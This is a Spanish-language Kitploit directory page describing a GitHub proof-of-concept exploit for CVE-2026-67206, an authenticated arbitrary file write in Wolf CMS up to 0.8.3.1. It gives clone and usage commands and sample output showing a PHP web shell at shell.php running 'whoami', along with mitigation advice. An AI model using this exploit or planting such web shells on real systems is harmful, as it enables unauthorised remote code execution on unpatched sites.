Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/anirbala98/cve-2026-67206
ExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

Exploit PoC para Wolf CMS <= 0.8.3.1: autentica en Admin, escribe un archivo PHP arbitrario en /public mediante FileManagerController y ejecuta comandos a través de una web shell.

Ver Repositorio
13hace 21 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE mediante escritura arbitraria de archivos

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2026-67206

Aviso legal

Este proyecto se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. No lo utilice contra sistemas que no sean de su propiedad o para los que no tenga permiso de prueba.

Resumen

Existe una vulnerabilidad de escritura arbitraria de archivos en las versiones de Wolf CMS hasta la 0.8.3.1. Permite a un atacante autenticado escribir archivos arbitrarios maliciosos en el directorio /public de la raíz web mediante las funciones create_file() y save() de FileManagerController.php. La función create_file() de FileManagerController.php no valida las extensiones de archivo, lo que permite a atacantes autenticados escribir scripts PHP maliciosos y obtener privilegios de ejecución remota de código.

Puede encontrar un análisis detallado con análisis de código fuente y demostración del exploit en mi blog de Medium.

Versión afectada

Todas las versiones de Wolf CMS hasta la 0.8.3.1 están afectadas. El repositorio de Wolf CMS fue archivado el 28 de agosto de 2021 y ya no se mantiene activamente. Actualmente no existen parches para esta vulnerabilidad.

Requisitos

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Instalación

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Ejemplo

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Iniciando sesión con las credenciales proporcionadas...
[+] Inicio de sesión exitoso

[*] Creando un archivo llamado shell.php...
[+] Creación del archivo exitosa

[*] Intentando escribir el payload en shell.php...
[+] ¡Payload escrito exitosamente!
[+] Se puede acceder a la web shell con la cadena de consulta 'cmd' en http://127.0.0.1:8080/public/shell.php
[+] Probando la salida de http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Mitigación

  • Valide las extensiones de los archivos creados por usuarios autenticados basándose en una lista de permitidos
  • No permita extensiones como .php, .phtml, .phar, .php5, etc., a menos que sea necesario
  • No permita la ejecución de PHP en los directorios de carga de la raíz del servidor web
  • Guarde los archivos creados en un servidor diferente si es posible para minimizar el impacto

Referencias

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
Descargar herramienta